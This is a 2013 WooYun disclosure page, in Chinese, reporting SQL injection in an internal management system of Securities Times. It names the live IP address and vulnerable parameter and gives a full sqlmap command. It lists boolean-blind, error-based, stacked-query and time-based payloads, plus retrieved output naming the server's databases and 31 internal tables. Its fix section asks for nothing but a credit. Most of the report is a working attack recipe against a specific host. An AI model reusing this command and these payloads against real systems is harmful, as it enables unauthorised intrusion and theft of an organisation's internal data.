当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034712

漏洞标题:证券时报内部管理系统sql注入

相关厂商:证券时报

漏洞作者: caspar

提交时间:2013-08-19 13:47

修复时间:2013-10-03 13:48

公开时间:2013-10-03 13:48

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-10-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

看到证券时报内部管理系统弱口令造成内部敏感信息泄漏这个帖子就顺手登录下,貌似有个注入点就顺手扫了下

详细说明:

注入点:http://116.246.39.203/announce.aspx?id=722
sqlmap注入
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://116.246.39.203/announce.aspx?id=722 --dbs
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=722 AND 7147=7147
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=722 AND 5463=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(111)+CHAR(122)+CHAR(58)+(SELECT (CASE WHEN (5463=5463) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(120)+CHAR(101)+CHAR(108)+CHAR(58)))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=722; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=722 WAITFOR DELAY '0:0:5'--
---
[12:36:19] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[12:36:19] [INFO] fetching database names
[12:36:19] [INFO] the SQL query used returns 7 entries
[12:36:19] [INFO] retrieved: master
[12:36:20] [INFO] retrieved: model
[12:36:20] [INFO] retrieved: msdb
[12:36:20] [INFO] retrieved: ReportServer
[12:36:20] [INFO] retrieved: ReportServerTempDB
[12:36:20] [INFO] retrieved: secutimes
[12:36:20] [INFO] retrieved: tempdb
available databases [7]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] secutimes
[*] tempdb

漏洞证明:

secutimes表
[31 tables]
+-----------------------------------+
| dbo.announce |
| dbo.announce_attachment |
| dbo.announce_employee |
| dbo.announce_replies |
| dbo.article |
| dbo.article_employee |
| dbo.article_newspaper |
| dbo.article_type |
| dbo.company |
| dbo.company_agreement |
| dbo.company_agreement_type |
| dbo.company_employee |
| dbo.company_project_record |
| dbo.company_project_record_leader |
| dbo.company_project_return |
| dbo.company_project_type |
| dbo.company_type |
| dbo.dtproperties |
| dbo.employee |
| dbo.employee_permission |
| dbo.employee_type |
| dbo.evaluate |
| dbo.genre |
| dbo.good_article |
| dbo.good_article_employee |
| dbo.good_article_vote |
| dbo.permission |
| dbo.province |
| dbo.topic |
| dbo.unread_record |
| dbo.work_volumn |
+-----------------------------------+

修复方案:

求个码

版权声明:转载请注明来源 caspar@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝